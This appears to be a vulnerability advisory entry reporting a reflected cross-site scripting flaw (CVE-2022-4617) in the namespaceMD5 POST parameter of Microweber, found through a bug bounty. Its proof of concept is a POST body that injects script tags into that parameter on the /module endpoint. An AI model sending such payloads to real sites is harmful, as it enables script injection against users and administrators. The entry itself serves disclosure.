Lucene search
Krizzsk1FB2CE08-7016-45FA-B402-EC08D700E4DFHistoryNov 08, 2022 - 5:26 p.m.
Post parameter namespaceMD5 is vulnerable to reflected XSS
2022-11-0817:26:08
krizzsk
www.huntr.dev
9
post parameter
reflected xss
namespacemd5
vulnerability
bug bounty
0.001 Low
EPSS
Percentile
29.1%
Description
The POST parameter namespaceMD5 is vulnerable to reflected XSS.
Proof of Concept
// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content
Related
osv
osv
Microweber vulnerable to Reflected Cross-site Scripting
2022-12-21 03:30:24
CVE-2022-4617
2022-12-21 01:15:11
veracode
veracode
Reflected Cross-Site Scripting (XSS)
2022-12-22 07:29:51
cve
cve
CVE-2022-4617
2022-12-21 01:15:11
nvd
nvd
CVE-2022-4617
2022-12-21 01:15:11
prion
prion
Cross site scripting
2022-12-21 01:15:00
cvelist
cvelist
github
github
Microweber vulnerable to Reflected Cross-site Scripting
2022-12-21 03:30:24